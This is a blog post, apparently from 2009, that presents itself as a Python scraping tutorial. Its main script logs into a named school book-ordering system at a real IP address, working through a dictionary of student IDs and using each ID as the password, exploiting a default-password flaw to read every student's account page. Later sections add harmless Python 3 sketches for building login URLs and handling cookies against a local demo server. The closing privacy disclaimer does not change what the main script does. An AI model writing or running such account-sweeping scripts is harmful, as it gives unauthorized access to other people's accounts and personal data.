
Web Scraping with Python for Login-Protected Websites

2009·06·26


Introduction to Web Scraping with Python

Last time I showed how to scrape grades using PHP and the curl library. Python scripts can do the same job, and quite elegantly; I'm growing fonder of Python all the time, haha. This time the target is my school's book ordering website. The system has a huge vulnerability: every user's default password is identical to their username. So I used it to practice web scraping. Here is the Python code first:

import urllib, urllib2, cookielib
import re
f = open("path/to/dictionary", "r")  # dictionary file: one student ID per line
username = f.readline().rstrip()
txt_last = ""
while username != '':
    # A fresh cookie jar for each ID, so cookies from one login never carry over to the next.
    a = cookielib.CookieJar()
    b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
    urllib2.install_opener(b)
    dust1 = 'http://211.82.90.56:8080/caubook/TeacherLog.aspx?' + \
            '__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgICBw8PZBY' + \
            'CHgdvbmNsaWNrBSdpZih0aGlzLmRpc2FibGVkPT1mYWxzZSl7cmV' + \
            '0dXJuICBiYygpO31kZP%2B9YQS1SQoVhX0gctevArgHvY9U&Tbusername='
    dust2 = username
    dust3 = '&Tbuserpwd='
    dust4 = username
    dust5 = '&RadioButtonList1=%E5%AD%A6%E7%94%9F&Button1=%E7%A1%AE%E8%AE%A4&__EVENTVALIDATION' + \
            '=%2FwEWBwKZqo6EDgKS6L7%2FCwK1gprrAQLo4%' + \
            '2BrNDQLN7c0VAveMotMNAoznisYGXMvRojLDcm7L2wkg34m0QFH3k5c%3D'
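    # Log in; the installed opener stores the cookie the server returns.
    response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)
    # Request the page that is only visible after logging in.
    next = urllib2.urlopen('http://211.82.90.56:8080/caubook/Student/StuAna1.aspx')
    # print next.read()
    txt = next.read()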
    if (txt != txt_last):
        txt_last = txt
        # txt = re.compile(r'<[^>]+>').sub('', txt)
        print txt
    username = f.readline().rstrip()
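
The long dust1 to dust5 concatenation in the listing above is hard to read. As a rough sketch only, and in Python 3 rather than the Python 2 used above (urllib.urlencode now lives at urllib.parse.urlencode), the query string could be assembled from a dictionary instead. The helper name build_login_url, the example.com address and the field values are placeholders invented for illustration; a real __VIEWSTATE value would still have to be copied from the page.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def build_login_url(base_url, username, password, hidden_fields):
    """Return base_url plus a percent-encoded query string (hypothetical helper)."""
    params = dict(hidden_fields)      # e.g. __VIEWSTATE copied from the page
    params["Tbusername"] = username
    params["Tbuserpwd"] = password
    return base_url + "?" + urlencode(params)


url = build_login_url(
    "http://example.com/TeacherLog.aspx",  # placeholder address
    "my_id",
    "my_id",
    {"__VIEWSTATE": "/wEP+abc="},          # shortened, made-up value
)
print(url)

# Decoding the query string gives back the original, unescaped values.
fields = parse_qs(urlsplit(url).query)
print(fields["__VIEWSTATE"][0])
```

urlencode percent-escapes characters such as / and + on its own, so sequences like %2F and %2B no longer need to be typed by hand.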

The third and fourth lines open a file that serves as a dictionary and read its first line. Each line is a student ID, which the program reads in and uses as both the username and the password (since by default the system sets the password equal to the username).

Now for the key parts of the program. dust1 through dust5 are the fragments of the URL string to be submitted. You can work this string out by analyzing the form (the POST section) in the page's HTML and by capturing packets; in other words, if entering the dust1+dust2+dust3+dust4+dust5 link in the browser logs you in normally, the string is right. This book ordering system has a lot of messy code, and since I don't know ASP.NET, I can't say why all of these fields need to be submitted. We only need to focus on the parameters following &Tbusername= and &Tbuserpwd=: the first is the username and the second is the password, and both are the student ID. We need to use

response = urllib2.urlopen(dust1 + dust2 + dust3 + dust4 + dust5)

to submit this URL. The server returns a cookie in its response. I used to have no idea how to save this cookie, but in Python we only need to set

a = cookielib.CookieJar()

and then execute

b = urllib2.build_opener(urllib2.HTTPCookieProcessor(a))
urllib2.install_opener(b)

to have the program automatically save the cookie returned after submission. With that, we can already simulate a browser submitting the login and keep the cookie that comes back. All that remains is to request the page we want while holding that cookie (that is, after logging in). In the listing, this is the second urlopen call, the one that fetches StuAna1.aspx.
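
For anyone on Python 3, where cookielib became http.cookiejar and urllib2 became urllib.request, the same two steps (log in, then fetch a page with the saved cookie) might look like the sketch below. To stay self-contained it talks to a tiny throwaway server on 127.0.0.1 rather than the real site; DemoHandler, fetch_with_cookies, the /login and /page paths and the session=abc123 cookie are all invented for this demo.

```python
import http.cookiejar
import http.server
import threading
import urllib.request


class DemoHandler(http.server.BaseHTTPRequestHandler):
    """Made-up stand-in for a login-protected site (not the real system)."""

    def do_GET(self):
        if self.path.startswith("/login"):
            # Pretend the login succeeded and hand out a session cookie.
            body = b"logged in"
            self.send_response(200)
            self.send_header("Set-Cookie", "session=abc123; Path=/")
        else:
            # Echo back whatever Cookie header the client sent.
            body = (self.headers.get("Cookie") or "no cookie").encode()
            self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the demo quiet


def fetch_with_cookies(base_url):
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({}),  # ignore system proxies for the local demo
        urllib.request.HTTPCookieProcessor(jar),
    )
    opener.open(base_url + "/login").read()                  # cookie is stored in jar
    page = opener.open(base_url + "/page").read().decode()   # cookie is sent back
    return page, [cookie.name for cookie in jar]


server = http.server.HTTPServer(("127.0.0.1", 0), DemoHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()
try:
    page, cookie_names = fetch_with_cookies("http://127.0.0.1:%d" % server.server_port)
finally:
    server.shutdown()
    server.server_close()

print(page)
print(cookie_names)
```

Here the opener is called directly through opener.open instead of being installed globally with install_opener; either way, the jar collects the cookie from the first response and attaches it to the second request.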

In summary, a few simple lines of code are enough to simulate a login and save the cookie. The same approach can be put to many other uses. My goal this time was only to scrape data, so I won't go into the rest; you can research it yourself :)

P.S. When scraping data, please respect others’ privacy and do not damage their data. Violators are responsible for their own actions.
